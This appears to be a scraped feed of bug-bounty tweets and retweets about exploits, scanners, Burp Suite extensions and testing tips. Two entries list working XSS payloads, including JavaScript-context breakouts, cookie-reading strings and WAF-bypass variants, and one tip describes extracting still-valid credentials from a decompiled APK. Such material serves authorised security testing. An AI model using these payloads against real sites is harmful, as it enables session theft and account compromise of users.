RT @nightbloodz_: Grafana: CVE-2025-4123 Exploit.

RT @Alra3ees: POCs Nuclei.This project is a Python script that is used to clone GitHub projects in batches, obtain Nuclei POCs, and store P….

RT @Alra3ees: Rscan:-.Automated scanning tool, more accurate fingerprint recognition, more comprehensive vulnerability scanning. https://t.….

');confirm(document.domain);//.';console.log(document.cookie);//.'"><svg/onload=alert(6)>.';location='';fetch('';document.write('<img src=x onerror=alert(1)>');//.';setTimeout(()=>{alert(1)},1000);//.

Try these #XSS payloads if output appears in JavaScript. (<script>) #bugbountytips .');alert(1);//.';alert(1)//.";alert(1);//.'});prompt(2)({.'-alert(1)-'.''.replace.call`1${/. /}${alert}`.'blobblob'.replace.call('1,,', /. /, alert).a=alert,(a?a:a)(origin).

RT @coffinxp7: Hi EveryOne: just little update i am making this toolkit its better the previous one you just need to enter the domain and i….

RT @thelilnix: An XSS payload (in JS context) for WAF and protection bypass (inspired by JavaScript for Hackers book from @garethheyes):. '….

Yay, I was awarded a three-digit bounty on @Hacker0x01! #TogetherWeHitHarder .#bugbountytips #bugbountytips .1. Downloaded the older version of the APK. 2. Decompile and find sensitive data like API,etc.3. API, creds were still valid and working.

RT @GodfatherOrwa: First live talk for the amazing @XHackerx007 don’t miss this .Lot of interesting stuff for authentication bypass . #bugb….

RT @KN0X55: 🚨 1st KNOXSS GIVEAWAY of 2025 ! 🚨 . LIKE + SHARE this. to have a chance to win one of the following subscriptions: . 1 Pro 3-….

RT @nav1n0x: Here’s the script if you want to try it yourself:.👉 Sharing the script as-is — make sure to update the….

RT @hackprove_: How I Test For Web Cache Vulnerabilities + Tips And Tricks.more information👉

RT @hackprove_: Account Takeover using SSO Logins.more information👉

RT @Alra3ees: Semgrep4BurpSuite: burpsuite extension to analyze javascript files using semgrep

RT @Black2Fan: I have published a tool based on jadx that helps analyze Java applications. BFScan generates HTTP….

RT @ryancbarnett: We (@akamai_research) often see these CSP bypass attempts. Example for w/OOB beaconing/blind XSS….

RT @Alra3ees: js-snitch: Scans remote JavaScript files with Trufflehog + Semgrep to detect leaked secrets

RT @Alra3ees: trufflehog-burp-suite-extension: Official TruffleHog Burp Suite Extension. Scan Burp Suite traffic for 800+ different types o….

RT @FaIyaZz007: Most people don't you this BurpSuite feature. In my latest video, I show how it can help find account takeovers and access….